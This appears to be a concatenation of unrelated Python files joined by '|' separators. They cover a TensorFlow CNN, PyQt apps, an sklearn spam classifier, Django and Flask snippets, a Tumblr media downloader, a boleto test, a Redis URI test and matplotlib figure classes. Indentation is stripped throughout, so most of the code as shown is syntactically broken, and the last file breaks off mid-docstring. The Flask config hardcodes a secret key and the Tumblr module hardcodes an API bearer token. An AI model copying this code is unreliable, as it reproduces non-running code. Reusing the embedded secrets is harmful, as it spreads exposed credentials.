num_units1 = 1024
with tf.name_scope('w1'):
w1 = tf.Variable(tf.truncated_normal([num_units2, num_units1]))
with tf.name_scope('b1'):
b1 = tf.Variable(tf.constant(0.1, shape=[num_units1]))
with tf.name_scope('hidden1'):
hidden1 = tf.nn.relu(tf.matmul(h_pool1_flat, w1) + b1)
with tf.name_scope('keep_prob'):
keep_prob = tf.placeholder(tf.float32)
with tf.name_scope('hidden1_drop'):
hidden1_drop = tf.nn.dropout(hidden1, keep_prob)
with tf.name_scope('layer0_output_fully_connected'):
with tf.name_scope('w0'):
w0 = tf.Variable(tf.zeros([num_units1, 10]))
with tf.name_scope('b0'):
b0 = tf.Variable(tf.zeros([10]))
with tf.name_scope('p'):
p = tf.nn.softmax(tf.matmul(hidden1_drop, w0) + b0)
t = tf.placeholder(tf.float32, [None, 10])
with tf.name_scope('optimizer'):
with tf.name_scope('loss'):
loss = -tf.reduce_sum(t * tf.log(tf.clip_by_value(p, 1e-10, 1.0)))
with tf.name_scope('train_step'):
train_step = tf.train.AdamOptimizer(0.0001).minimize(loss)
with tf.name_scope('correct_prediction'):
correct_prediction = tf.equal(tf.argmax(p, 1), tf.argmax(t, 1))
with tf.name_scope('accuracy'):
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
tf.summary.scalar("loss", loss)
tf.summary.scalar("accuracy", accuracy)
tf.summary.scalar("w0", tf.reduce_sum(w0))
tf.summary.scalar("w1", tf.reduce_sum(w1))
self.x, self.t, self.p = x, t, p
self.train_step = train_step
self.loss = loss
self.accuracy = accuracy
self.keep_prob = keep_prob
def prepare_session(self):
sess = tf.InteractiveSession()
sess.run(tf.initialize_all_variables())
summary = tf.summary.merge_all()
writer = tf.summary.FileWriter("./log/1023_CNN_nonliner", sess.graph)
        # the directory and file name for the TensorBoard log are chosen here
self.sess = sess
self.summary = summary
self.writer = writer
if __name__ == '__main__':
data, labels_non_onehot, test_data, test_labels_non_onehot, label_names = load_cifer10.load_dataset()
print(label_names)
labels = np.mat([[0 for i in range(10)] for k in range(len(labels_non_onehot))])
for i in range(len(labels)):
labels[i] = np.eye(10)[labels_non_onehot[i]]
test_labels = np.mat([[0 for i in range(10)] for k in range(len(test_labels_non_onehot))])
for i in range(len(test_labels)):
test_labels[i] = np.eye(10)[test_labels_non_onehot[i]]
nn = layer()
batchsize = 100
batch_xs = np.mat([[0.0 for n in range(3072)] for k in range(batchsize)])
batch_ts = np.mat([[0.0 for n in range(10)] for k in range(batchsize)])
print(test_data[0].shape)
print(test_data.shape)
loop_len = 200000
for i in range(loop_len):
for n in range(batchsize):
tmp = int(random.uniform(0, len(data)))
batch_xs[n] = data[tmp].reshape(1, 3072)
batch_xs[n] /= batch_xs[n].max()
batch_ts[n] = labels[tmp].reshape(1, 10)
nn.sess.run(nn.train_step, feed_dict={nn.x: batch_xs, nn.t: batch_ts, nn.keep_prob: 1.0})
if i % 100 == 0:
summary, loss_val, acc_val = nn.sess.run(
[nn.summary, nn.loss, nn.accuracy],
feed_dict={nn.x: test_data, nn.t: test_labels, nn.keep_prob: 1.0})
print('Step: %d, Loss: %f, Accuracy: %f'
% (i, loss_val, acc_val))
nn.writer.add_summary(summary, i)
|
import sys
from random import randint
from PyQt5 import uic, QtCore, QtWidgets
from PyQt5.QtGui import QPainter, QColor
from PyQt5.QtWidgets import QApplication
from PyQt5.QtWidgets import QMainWindow
from UI import Ui_MainWindow
class YellowEllipses(QMainWindow, Ui_MainWindow):
def __init__(self):
super().__init__()
        self.painter = QPainter(self)  # note: unused; the actual painting happens in paintEvent
self.setupUi(self)
self.do_paint = False
self.initUI()
def initUI(self):
        self.setWindowTitle('Git и жёлтые окружности')  # "Git and yellow circles"
self.generate_btn.clicked.connect(self.paint)
def paintEvent(self, event):
if self.do_paint:
qp = QPainter()
qp.begin(self)
self.generate(qp)
qp.end()
def paint(self):
self.do_paint = True
self.repaint()
def generate(self, qp):
x, y = randint(0, 500), randint(0, 500)
qp.setBrush(QColor(randint(0, 255), randint(0, 255), randint(0, 255)))
qp.drawEllipse(self.ellipse_label.x(), self.ellipse_label.y(), x, y)
self.do_paint = False
if __name__ == '__main__':
app = QApplication(sys.argv)
ex = YellowEllipses()
ex.show()
sys.exit(app.exec())
|
# 1
# name = input("What is your name?: \n")
# print("Hello " + name)
# 2
# x = 10
# print(x)
#3
# personNumber = int(input("Choose any whole number: \n"))
# if personNumber > 10:
# print("Your number is greater than 10")
# elif personNumber < 10:
# print("Your number is less than 10")
# else:
# print("Your number is 10")
#4
# personNumber2 = int(input("Choose any whole number: \n"))
# if personNumber2 % 2 == 0:
# print("Even")
# else:
# print("Odd")
#5
# list = ["France", "Belgium", "U.S.A", "China", "Russia"]
# for i in list:
# print(i)
#6
import random
list2 = [] |
# Load libraries
import pandas
from pandas.plotting import scatter_matrix
import matplotlib.pyplot as plt
from sklearn import model_selection
from sklearn.metrics import classification_report
from sklearn.metrics import confusion_matrix
from sklearn.metrics import accuracy_score
from sklearn.linear_model import Perceptron
from sklearn.svm import SVC
from sklearn.svm import NuSVC
from sklearn.neural_network import MLPClassifier
import numpy as np
# Load dataset
filename = "spambase.csv"
dataset = pandas.read_csv(filename,header=None)
# Split-out validation dataset
array = dataset.values
X = array[:,0:57] # columns 0-56 are the features; column 57 is the class label
Y = array[:,57]
validation_size = 0.20
seed = 7
scoring = 'accuracy' # ratio of correct predictions / total nr of instances
X_train, X_validation, Y_train, Y_validation = model_selection.train_test_split(X, Y, test_size=validation_size, random_state=seed)
# models = []
# # models.append(('SVM', SVC(C=3, shrinking=False)))
# models.append(('NN1', MLPClassifier(random_state=0)))
# models.append(('NN2', MLPClassifier(random_state=0,hidden_layer_sizes=(200,))))
# models.append(('NN3', MLPClassifier(random_state=0,activation='logistic')))
# models.append(('NN4', MLPClassifier(random_state=0,activation='tanh')))
# models.append(('NN5', MLPClassifier(random_state=0,alpha=0.001)))
# # evaluate each model in turn
# results = []
# names = []
# for name, model in models:
# kfold = model_selection.KFold(n_splits=10, random_state=seed)
# cv_results = model_selection.cross_val_score(model, X_train, Y_train, cv=kfold, scoring=scoring)
# results.append(cv_results)
# names.append(name)
# msg = "Validation error for %s: %f (%f)" % (name, cv_results.mean(), cv_results.std())
# print(msg)
# model.fit(X_train, Y_train)
# predictions = model.predict(X_validation)
# print('Test error is ' + str(accuracy_score(Y_validation, predictions)))
# print(confusion_matrix(Y_validation, predictions))
# print(classification_report(Y_validation, predictions))
# Grid search over activation functions and alpha values via 10-fold CV
models = []
val_errors = []
names = []
cur_err = 0  # despite the name, this tracks the best (highest) mean CV accuracy so far
cur_clf = MLPClassifier(random_state=0)
alphas = [0, 0.0001, 0.001, 0.01, 0.1, 1, 10]
act = ['identity', 'logistic', 'tanh', 'relu']
# alphas = [10, 100, 1000, 5000]
# reg = ['l2']
i = 0
for a in act:
for alp in alphas:
models.append(('NN'+str(i)+' '+a, MLPClassifier(random_state=0,activation=a,alpha=alp)))
i += 1
for name, model in models:
kfold = model_selection.KFold(n_splits=10, random_state=seed)
cv_results = model_selection.cross_val_score(model, X_train, Y_train, cv=kfold, scoring=scoring)
cv_err = cv_results.mean()
val_errors.append(cv_results)
#names.append(name)
msg = "%s: %f (%f)" % (name, cv_err, cv_results.std())
print(msg)
if cv_err > cur_err:
cur_err = cv_err
cur_clf = model
cur_clf.fit(X_train, Y_train)
predictions = cur_clf.predict(X_validation)
print('Best model is:')
print(cur_clf)
print('With an accuracy score of: ' + str(accuracy_score(Y_validation, predictions)))
print(confusion_matrix(Y_validation, predictions))
print(classification_report(Y_validation, predictions))
print('Nr of iterations: ' + str(cur_clf.n_iter_))
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('basic', '0029_auto_20160317_2257'),
]
operations = [
migrations.CreateModel(
name='Base',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('username', models.CharField(null=True, blank=True, max_length=50)),
('unique_key', models.CharField(null=True, blank=True, max_length=100, unique=True)),
],
options={
'verbose_name': 'Base Class',
},
),
migrations.DeleteModel(
name='Questions',
),
]
|
# -*- coding: utf-8 -*-
import unittest
import datetime
from pyboleto.bank.bradesco import BoletoBradesco
from testutils import BoletoTestCase
class TestBancoBradesco(BoletoTestCase):
def setUp(self):
self.dados = []
for i in range(3):
d = BoletoBradesco()
d.carteira = '06'
d.agencia_cedente = '278-0'
d.conta_cedente = '039232-4'
d.data_vencimento = datetime.date(2011, 2, 5)
d.data_documento = datetime.date(2011, 1, 18)
d.data_processamento = datetime.date(2011, 1, 18)
d.valor_documento = 8280.00
d.nosso_numero = str(2125525 + i)
d.numero_documento = str(2125525 + i)
self.dados.append(d)
def test_linha_digitavel(self):
self.assertEqual(self.dados[0].linha_digitavel,
'23790.27804 60000.212559 25003.923205 4 48690000828000'
)
def test_codigo_de_barras(self):
self.assertEqual(self.dados[0].barcode,
'23794486900008280000278060000212552500392320'
)
def test_agencia(self):
self.assertEqual(self.dados[0].agencia_cedente, '0278-0')
def test_conta(self):
self.assertEqual(self.dados[0].conta_cedente, '0039232-4')
def test_boleto_props(self):
props = self.dados[0].get_boleto_props()
        self.assertEqual(len(props), 3)
        self.assertEqual(props[0].name, 'agencia_cedente')
        self.assertEqual(props[1].name, 'conta_cedente')
        self.assertEqual(props[2].name, 'nosso_numero')
suite = unittest.TestLoader().loadTestsFromTestCase(TestBancoBradesco)
if __name__ == '__main__':
unittest.main()
|
#!/usr/bin/env python
import logging
from ProdAgentCore.Codes import errors
from ProdCommon.Database import Session
from ProdMgrInterface import MessageQueue
from ProdMgrInterface.Registry import registerHandler
from ProdMgrInterface.States.StateInterface import StateInterface
from ProdMgrInterface.States.Aux import HandleJobSuccess
import ProdMgrInterface.Interface as ProdMgrAPI
class QueuedMessages(StateInterface):
def __init__(self):
StateInterface.__init__(self)
def execute(self):
logging.debug("Executing state: QueuedMessages")
ignoreUrl={}
if not HandleJobSuccess.ms:
HandleJobSuccess.ms=self.ms
HandleJobSuccess.trigger = self.trigger
for report_type in ['ReportJobSuccess']:
start=0
amount=10
messages=MessageQueue.retrieve('ProdMgrInterface',report_type,start,amount)
while(len(messages)>0):
for message in messages:
if not ignoreUrl.has_key(message['server_url']):
MessageQueue.remove(message['id'])
result=HandleJobSuccess.sendMessage(message['server_url'],message['parameters'])
if result['url']=='failed':
ignoreUrl[message['server_url']]='failed'
message['parameters']['result']=result['result']
HandleJobSuccess.handleResult(message['parameters'])
logging.debug("Retrieve next message in queue")
start=start+amount
messages=MessageQueue.retrieve('ProdMgrInterface',report_type,start,amount)
logging.debug("Examined all messages in queue. Moving to next state")
registerHandler(QueuedMessages(),"QueuedMessages")
|
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from flask_bcrypt import Bcrypt
from flask_login import LoginManager
app = Flask(__name__)
app.config['SECRET_KEY']='57ba628bb0b13ce0c676dfde280ba245'
app.config['SQLALCHEMY_DATABASE_URI']='sqlite:///site2.db'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS']=False
db=SQLAlchemy(app)
bcrypt=Bcrypt(app)
login_manager=LoginManager(app)
login_manager.login_view='login'
login_manager.login_message_category='info'
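# routes is imported at the bottom, after app/db/bcrypt/login_manager exist,
# because routes in turn imports from this package; importing it any earlier
# would trigger a circular import.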
from flaskblog import routes |
# class A:
# def __init__(self):
# print "enter A"
# print "leave A"
# class B(A):
# def __init__(self):
# print "enter B"
# A.__init__(self)
# print "leave B"
class A(object):
def __init__(self):
print "enter A"
print "leave A"
class C(object):
def __init__(self):
print "enter C"
print "leave C"
class B(C):
def __init__(self):
print "enter B"
# A.__init__(self)
super(B, self).__init__()
print "leave B"
b = B()
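# Expected output: super(B, self) follows B's MRO (B -> C -> object), so
# C.__init__ runs between the B prints:
#   enter B
#   enter C
#   leave C
#   leave B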
|
import json
import numpy as np
import datetime
import pandas as pd
name = "Paul Millsap"
with open("./../data/player_monthly_PER.json") as fp:
data = json.load(fp)
date = list()
pers = list()
mt = ["%02d" % m for m in range(1, 13)]  # months as zero-padded strings; a list survives repeated iteration
yt = [str(y) for y in range(2006, 2017)]
result = dict()
for year in yt:
for month in mt:
#date.append(year + "-" + month)
#pers.append(data[name][year][month]["PER"])
if data[name][year][month]["PER"] == "NAN":
result[year + "-" + month] = "NaN"
else:
result[year + "-" + month] = data[name][year][month]["PER"]
df = pd.DataFrame(list(result.items()), columns=['month', 'PER'], index=result.keys())
df.to_csv("test.csv")
|
#coding:utf8
import downloader
from translator import tr_
from utils import Soup, Session, query_url, get_max_range, Downloader, clean_title, update_url_query, get_print, get_ext, LazyUrl, urljoin, check_alive
import ree as re
import errors
from ratelimit import limits, sleep_and_retry
from error_printer import print_error
class Image:
def __init__(self, url, id, referer, p, cw=None):
self._url = url
self.id_ = id
self.p = p
self.cw = cw
self.url = LazyUrl(referer, self.get, self)
@sleep_and_retry
@limits(4, 1)
def get(self, _):
print_ = get_print(self.cw)
url = self._url
ext = get_ext(url)
if ext.lower()[1:] not in ['jpg', 'png', 'mp4']: #4645
print_('get_ext: {}, {}'.format(self.id_, url))
try:
ext = downloader.get_ext(url, referer=_)
except Exception as e: #3235
print_('Err: {}, {}\n'.format(self.id_, url)+print_error(e))
self.filename = '{}_p{}{}'.format(self.id_, self.p, ext)
return url
class Downloader_tumblr(Downloader):
type = 'tumblr'
URLS = ['tumblr.com']
MAX_CORE = 4
def init(self):
if 'tumblr.com/post/' in self.url:
            raise errors.Invalid(tr_('개별 다운로드는 지원하지 않습니다: {}').format(self.url))  # "Individual downloads are not supported: {}"
self.session = Session()
@classmethod
def fix_url(cls, url):
qs = query_url(url)
path = qs.get('redirect_to')
if path:
url = urljoin('https://tumblr.com', path[0])
id = get_id(url)
return 'https://{}.tumblr.com'.format(id)
def read(self):
username = get_id(self.url)
name = get_name(username, self.session)
for img in get_imgs(username, self.session, cw=self.cw):
self.urls.append(img.url)
self.title = clean_title('{} (tumblr_{})'.format(name, username))
class TumblrAPI:
_url_base = 'https://www.tumblr.com/api'
_hdr = {
'referer': 'https://www.tumblr.com',
'authorization': 'Bearer aIcXSOoTtqrzR8L8YEIOmBeW94c3FmbSNSWAUbxsny9KKx5VFh',
}
_qs = {
'fields[blogs]': 'name,avatar,title,url,is_adult,?is_member,description_npf,uuid,can_be_followed,?followed,?advertiser_name,is_paywall_on,theme,subscription_plan,?primary,share_likes,share_following,can_subscribe,subscribed,ask,?can_submit,?is_blocked_from_primary,?tweet,?admin,can_message,?analytics_url,?top_tags,paywall_access',
'npf': 'true',
'reblog_info': 'false',
'include_pinned_posts': 'false',
#'page_number': None,
}
def __init__(self, session, cw=None):
self.session = session
self.cw = cw
def print_(self, s):
get_print(self.cw)(s)
@sleep_and_retry
@limits(1, 1)
def call(self, path, qs, default_qs=True):
if default_qs:
qs_new = qs
qs = self._qs.copy()
qs.update(qs_new)
url = self._url_base + path
url = update_url_query(url, qs)
r = self.session.get(url, headers=self._hdr)
data = r.json()
errs = data.get('errors', [])
if errs:
code = int(errs[0]['code'])
if code == 0:
raise Exception('Not found')
elif code == 4012:
raise errors.LoginRequired(errs[0]['detail'])
r.raise_for_status()
return data['response']
def name(self, username):
path = '/v2/blog/{}/posts'.format(username)
data = self.call(path, {})
return data['blog']['title'] or data['blog']['name']
def posts(self, username):
path = '/v2/blog/{}/posts'.format(username)
qs = {}
ids = set()
default_qs = True
while True:
check_alive(self.cw)
data = self.call(path, qs, default_qs=default_qs)
for post in (post for post in data['posts'] if post['object_type'] != 'backfill_ad'):
id_ = post['id']
if id_ in ids:
self.print_('duplicate: {}'.format(id_))
continue
ids.add(id_)
url = 'https://{}.tumblr.com/post/{}'.format(username, id_)
yield Post(post, url, self.cw)
try:
links = data.get('links') or data['_links']
path_next = links['next']['href']
except:
path_next = None
if path_next:
path = path_next
default_qs = False
else:
break
class Post:
def __init__(self, data, url, cw=None):
id_ = data['id']
self.imgs = []
cs = data['content']
for trail in data['trail']:
cs += trail['content']
for c in cs:
if c['type'] in ['image', 'video']:
media = c.get('media')
if not media: #2859
continue
if isinstance(media, list):
media = media[0]
img = media['url']
self.imgs.append(Image(img, id_, url, len(self.imgs), cw))
elif c['type'] in ['text', 'link', 'audio']:
continue
else:
raise NotImplementedError(id_, c)
def get_name(username, session):
return TumblrAPI(session).name(username)
def get_imgs(username, session, cw=None):
print_ = get_print(cw)
artist = get_name(username, session)
imgs = []
error_count = 0
max_pid = get_max_range(cw)
api = TumblrAPI(session, cw)
for post in api.posts(username):
check_alive(cw)
imgs += post.imgs
        s = '{} {} (tumblr_{}) - {}'.format(tr_('읽는 중...'), artist, username, len(imgs))  # tr_: "Reading..."
if cw:
cw.setTitle(s)
else:
print(s)
if len(imgs) > max_pid:
break
return imgs[:max_pid]
def get_id(url):
if '/dashboard/blog/' in url:
url = re.find('/dashboard/blog/([0-9a-zA-Z_-]+)', url)
if '/login_required/' in url:
url = url.split('/login_required/')[1].split('?')[0].split('/')[0]
if 'tumblr.com/blog/view/' in url:
url = url.split('tumblr.com/blog/view/')[1]
if 'tumblr.com' in url:
if 'www.tumblr.com' in url:
qs = query_url(url)
url = qs.get('url', [url])[0]
url = url.split('.tumblr.com')[0].split('/')[(-1)]
if url == 'www':
raise Exception('no id')
return url
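# e.g. get_id('https://someblog.tumblr.com/archive') -> 'someblog' (hypothetical URL)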
|
from django.shortcuts import render
from .forms import ViewAvailableCourse
# Create your views here.
def view_course(request):
if request.method=="POST":
form=ViewAvailableCourse(request.POST)
if form.is_valid():
form.save()
else:
print(form.errors)
else:
form=ViewAvailableCourse()
return render (request,"view_course.html",{"form":form})
|
# -*- coding:utf-8 -*-
__author__ = 'gzs2473'
from PyQt4 import QtCore
from PyQt4 import QtGui
from ui.Ui_room import Ui_room_window
from table_widget import TableWidget
from play_window import PlayWindow
from custom_dialog import CustomDialog
class RoomWindow(CustomDialog, Ui_room_window):
send_signal = QtCore.pyqtSignal(dict)
enter_table_signal = QtCore.pyqtSignal(int)
def __init__(self, parent=None):
super(RoomWindow, self).__init__(parent)
        self.table_num = -1 # which table the current user sits at; -1 means none
        # marks which seats are already occupied
self.tables = [([0] * 2) for i in range(16)]
self.setupUi(self)
self.__beautify()
self.__connect_slots()
    ###########################################################
    # style the widgets
    ###########################################################
def __beautify(self):
self.setTexture(u":/img/skin.png")
self.min_btn.setAutoDefault(False)
self.close_btn.setAutoDefault(False)
self.title_label.setFont(QtGui.QFont(u"微软雅黑", 9))
        self.title_label.setText(u" 五子棋 made by 9527")  # "Gomoku (five in a row) made by 9527"
self.count_label.setFont(QtGui.QFont(u"微软雅黑", 9))
self.textBrowser.setFont(QtGui.QFont(u"微软雅黑", 9))
self.lineEdit.setFont(QtGui.QFont(u"微软雅黑", 9))
self.score_label.setFont(QtGui.QFont(u"微软雅黑", 9))
self.record_label.setFont(QtGui.QFont(u"微软雅黑", 9))
self.name_label.setFont(QtGui.QFont(u"微软雅黑", 11))
self.players_btn.setFont(QtGui.QFont(u"微软雅黑",8))
self.rank_btn.setFont(QtGui.QFont(u"微软雅黑",8))
self.players_btn.setText(u"玩家列表")
self.rank_btn.setText(u"排行榜")
self.rank_4.setFont(QtGui.QFont(u"华文行楷", 16))
self.rank_5.setFont(QtGui.QFont(u"华文行楷", 16))
self.rank_table.horizontalHeader().resizeSection(0, 180)
self.rank_table.setFont(QtGui.QFont(u"微软雅黑", 10))
self.stackedWidget.setCurrentIndex(0)
    ###########################################################
    # connect signals and slots
    ###########################################################
def __connect_slots(self):
self.lineEdit.returnPressed.connect(self.__send_message)
self.min_btn.clicked.connect(self.showMinimized)
self.close_btn.clicked.connect(self.quit)
self.send_btn.clicked.connect(self.__send_message)
self.mapper = QtCore.QSignalMapper()
self.__init_tables(16)
self.mapper.mapped.connect(self.__enter_table)
self.players_btn.clicked.connect(self.__show_players)
self.rank_btn.clicked.connect(self.__show_rank)
def set_rank_list(self, items):
if not items: return
for i in range(5):
self.rank_table.setItem(i, 0, QtGui.QTableWidgetItem(items[i][0]))
self.rank_table.setItem(i, 1, QtGui.QTableWidgetItem(u"积分:%d" % items[i][1]))
@QtCore.pyqtSlot()
def __show_players(self):
self.stackedWidget.setCurrentIndex(0)
@QtCore.pyqtSlot()
def __show_rank(self):
self.stackedWidget.setCurrentIndex(1)
    ###########################################################
    # add the tables in the game lobby
    # for simplicity, only 16 tables are added
    ###########################################################
def __init_tables(self, num):
for i in xrange(num):
table_widget = TableWidget()
table_widget.setObjectName(u"table%d" % i)
table_widget.setStyleSheet(u"QWidget#table%d{background-image: url(:/img/tablen.bmp);}" % i)
self.gridLayout.addWidget(table_widget, i / 4, i % 4, 1, 1)
table_widget.left_btn.clicked.connect(self.mapper.map)
table_widget.right_btn.clicked.connect(self.mapper.map)
self.mapper.setMapping(table_widget.left_btn, i * 100 + 0)
self.mapper.setMapping(table_widget.right_btn, i * 100 + 1)
###########################################################
    # Enter a game table
###########################################################
@QtCore.pyqtSlot(int)
def __enter_table(self, num):
        # if this seat is already taken, do nothing
if self.tables[num / 100][num % 100]:
return
if self.table_num >= 0:
return
self.table_num = num
self.tables[num / 100][num % 100] = 1
msg = {
'sid': 2001,
'cid': 1001,
'table': num
}
self.play_window = PlayWindow(num)
self.play_window.close_btn.clicked.connect(self.__leave_table)
if self.tables[num / 100][1 - num % 100]:
self.play_window.is_white = 0
else:
self.play_window.is_white = 1
table_widget = self.findChild(TableWidget, u"table%d" % (num / 100))
if num % 100:
table_widget.right_btn.setStyleSheet(u"background-image:url(:/img/17-1.png);background-color:transparent;")
else:
table_widget.left_btn.setStyleSheet(u"background-image:url(:/img/17-1.png);background-color:transparent;")
self.send_signal.emit(msg)
self.enter_table_signal.emit(num)
###########################################################
    # Leave a game table
###########################################################
@QtCore.pyqtSlot()
def __leave_table(self):
table_widget = self.findChild(TableWidget, u"table%d" % (self.table_num / 100))
if self.table_num % 100:
table_widget.right_btn.setStyleSheet(u"background-color:transparent;")
else:
table_widget.left_btn.setStyleSheet(u"background-color:transparent;")
self.tables[self.table_num / 100][self.table_num % 100] = 0
self.table_num = -1
###########################################################
    # Lobby chat feature
###########################################################
@QtCore.pyqtSlot()
def __send_message(self):
txt = self.lineEdit.text()
if txt == '':
return
self.lineEdit.clear()
self.textBrowser.append(u"<font color='red'>我 - 说:</>")
self.textBrowser.append(u" " + txt)
msg = {
'sid': 2002,
'cid': 1001,
'content': unicode(txt.toUtf8(), 'utf-8', 'ignore')
}
self.send_signal.emit(msg)
###########################################################
    # When quitting the lobby, notify the server that we are leaving
###########################################################
@QtCore.pyqtSlot()
def quit(self):
msg = {
'sid': 2000,
'cid': 1002,
}
self.send_signal.emit(msg)
self.close() |
def diagonalDifference(arr: list[list], size: int) -> int:
"""[summary]
Args:
arr (list[list]): [description]
size (int): [description]
Returns:
int: [description]
"""
d1 = 0
d2 = 0
for i in range(size):
for j in range(size):
if i == j:
d1 += arr[i][j]
if (i + j) == size - 1:
d2 += arr[i][j]
rst = abs(d1 - d2)
return rst
if __name__ == "__main__":
mtx = [[11, 2, 4], [4, 5, 6], [10, 8, -12]]
print(diagonalDifference(mtx, 3))
|
import unittest
from migrator import main
class TestMain(unittest.TestCase):
def test_parse_uri(self):
testcases = [
{
'uri': 'localhost',
'host': 'localhost',
'port': 6379,
'db': 0,
},
{
'uri': '192.168.192.41/1',
'host': '192.168.192.41',
'port': 6379,
'db': 1,
},
{
'uri': 'user-redis-cluster.example.com:6380',
'host': 'user-redis-cluster.example.com',
'port': 6380,
'db': 0,
},
{
'uri': 'user-redis-cluster.example.com:6380/2',
'host': 'user-redis-cluster.example.com',
'port': 6380,
'db': 2,
},
]
for tc in testcases:
host, port, db = main.parse_uri(tc['uri'])
self.assertEqual(host, tc['host'])
self.assertEqual(port, tc['port'])
self.assertEqual(db, tc['db'])
if __name__ == '__main__':
unittest.main()
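# A minimal parse_uri sketch consistent with the cases above (hypothetical;
# the real migrator.main.parse_uri may differ in details):
#
#   def parse_uri(uri, default_port=6379, default_db=0):
#       host_port, _, db = uri.partition('/')
#       host, _, port = host_port.partition(':')
#       return (host,
#               int(port) if port else default_port,
#               int(db) if db else default_db)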
|
from os.path import join
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from matplotlib.colors import ListedColormap
from .settings import *
class Figure:
"""
Base class for figures providing some common methods.
Attributes:
name (str) - figure name
directory (str) - default path for saving figure
fig (matplotlib.figure.Figure)
axes (matplotlib.axes.AxesSubplots)
"""
def __init__(self, name='unnamed', directory='../graphics'):
self.name = name
self.directory = directory
self.fig = None
@staticmethod
def create_figure(figsize=(3, 3)):
"""
Create blank figure.
Args:
figsize (tuple) - figure dimensions
"""
fig = plt.figure(figsize=figsize)
return fig
def add_axes(self, nrows=1, ncols=1):
"""
Add axes to figure.
Args:
nrows, ncols (int) - number of rows and columns
"""
self.axes = self.fig.subplots(nrows=nrows, ncols=ncols)
def save(self, **kwargs):
"""
Save figure to file.
Keyword Arguments:
fmt (str) - file format, eg 'pdf'
dpi (int) - resolution
transparent (bool) - if True, remove background
rasterized (bool) - if True, rasterize figure data
addtl kwargs: keyword arguments for plt.savefig
"""
self._save(self.fig, self.name, self.directory, **kwargs)
@staticmethod
def _save(fig,
name,
dirpath='./',
fmt='pdf',
dpi=300,
transparent=True,
rasterized=True,
**kwargs):
"""
Save figure to file.
Args:
fig (matplotlib.figures.Figure) - figure to be saved
name (str) - file name without format extension
dirpath (str) - directory in which to save file
fmt (str) - file format, eg 'pdf'
dpi (int) - resolution
transparent (bool) - if True, remove background
rasterized (bool) - if True, rasterize figure data
kwargs: keyword arguments for plt.savefig
"""
        path = join(dirpath, name + '.{}'.format(fmt))
        kw = dict(dpi=dpi, transparent=transparent, rasterized=rasterized)
        kw.update(kwargs)
        fig.savefig(path, format=fmt, **kw)
def _add_markers(self, x, y, c, **kwargs):
"""
Add markers to axis.
Args:
x, y (array like) - marker x and y positions
c (array like) - marker colors
kwargs: keyword arguments for matplotlib.pyplot.scatter
"""
        if len(self.fig.axes) == 0:
            self.fig.subplots()
        ax = self.fig.axes[0]
# add markers to plot
ax.scatter(x, y, c=c, **kwargs)
def format(self, **kwargs):
""" Format all figure axes. """
for ax in self.fig.axes:
self.format_axis(ax, **kwargs)
def format_axis(self, ax):
""" Format individual axis. """
pass
class CellSelection(Figure):
"""
Visualize cell selection by overlaying cell position markers on top of an image of a single RGB layer.
Inherited attributes:
name (str) - figure name ('selection')
directory (str) - default path for saving figure
fig (matplotlib.figure.Figure)
axes (matplotlib.axes.AxesSubplots)
"""
def __init__(self, layer, data, channel='r', **kwargs):
"""
Instantiate cell selection figure.
Args:
layer (Layer) - RGB image layer
data (pd.DataFrame) - selected cell measurement data
channel (str) - color channel to be added
kwargs: keyword arguments for render
"""
Figure.__init__(self, name='selection')
        self.render(layer, data, channel=channel, **kwargs)
def render(self, layer, data, channel='r', figsize=(3, 3)):
"""
Render figure.
Args:
layer (Layer) - RGB image layer
data (pd.DataFrame) - selected cell measurement data
channel (str) - color channel to be added
figsize (tuple) - figure dimensions
"""
# create figure
self.fig = self.create_figure(figsize)
self.add_axes()
# add image
self.add_image(layer, channel=channel)
# add cell position markers
self.add_markers(data)
def add_image(self, layer, channel='r'):
"""
Add scalar image to figure.
Args:
layer (Layer) - RGB image layer
channel (str) - color channel to be added
"""
        ax = self.fig.axes[0]
        _ = layer.get_channel(channel).show(ax=ax, segments=False, cmap=None)
        _ = ax.axis('off')
def add_markers(self, data, color_by='genotype', xykey=None, **kwargs):
"""
Add cell position markers to axis.
Args:
data (pd.DataFrame) - selected cell measurement data
color_by (str) - cell measurement attribute used to color markers
xykey (list) - attribute keys for cell x/y positions
kwargs: keyword arguments for markers
"""
if xykey is None:
xykey = ['centroid_x', 'centroid_y']
# get cell coordinates and color vector
x, y = data[xykey].values.T
# get color vector and colormap
c = data[color_by]
cmap = ListedColormap(['y', 'c', 'm'], 'indexed', 3)
# add markers to plot
self._add_markers(x, y, c, cmap=cmap, vmin=0, vmax=2, **kwargs)
class Scatterplot(Figure):
"""
Scatter points in XY plane.
Attributes:
xvar, yvar (str) - cell measurement features to be scattered
Inherited attributes:
name (str) - figure name
directory (str) - default path for saving figure
fig (matplotlib.figure.Figure)
axes (matplotlib.axes.AxesSubplots)
"""
def __init__(self, data, xvar, yvar, name, **kwargs):
"""
Instantiate scatter plot.
Args:
data (pd.DataFrame) - selected cell measurement data
xvar, yvar (str) - cell measurement features to be scattered
name (str) - figure name
            kwargs: keyword arguments for render
"""
Figure.__init__(self, name=name)
self.xvar, self.yvar = xvar, yvar
self.render(data, **kwargs)
def render(self, data, figsize=(2, 2)):
"""
Render figure.
Args:
data (pd.DataFrame) - selected cell measurement data
figsize (tuple) - figure dimensions
"""
# create figure
self.fig = self.create_figure(figsize)
self.add_axes()
# add data
self._add_markers(data[self.xvar], data[self.yvar], c='k', s=1)
# format axes
self.format()
def format_axis(self, ax):
"""
Format axis.
Args:
ax (matplotlib.axes.AxesSubplot)
"""
_ = ax.spines['top'].set_visible(False)
_ = ax.spines['right'].set_visible(False)
        _ = ax.set_xlabel(self.xvar)
        _ = ax.set_ylabel(self.yvar)
class BackgroundCorrelation(Scatterplot):
"""
Plot correlated expression between red and green fluorescence channels.
Inherited attributes:
xvar, yvar (str) - cell measurement features to be scattered
name (str) - figure name
directory (str) - default path for saving figure
fig (matplotlib.figure.Figure)
axes (matplotlib.axes.AxesSubplots)
"""
def __init__(self, data, name, figsize=(2, 2)):
"""
Instantiate background correlation plot.
Args:
data (pd.DataFrame) - selected cell measurement data
name (str) - figure name
figsize (tuple) - figure size
"""
Scatterplot.__init__(self, data, 'r', 'g', name, figsize=figsize)
def format_axis(self, ax):
"""
Format axis.
Args:
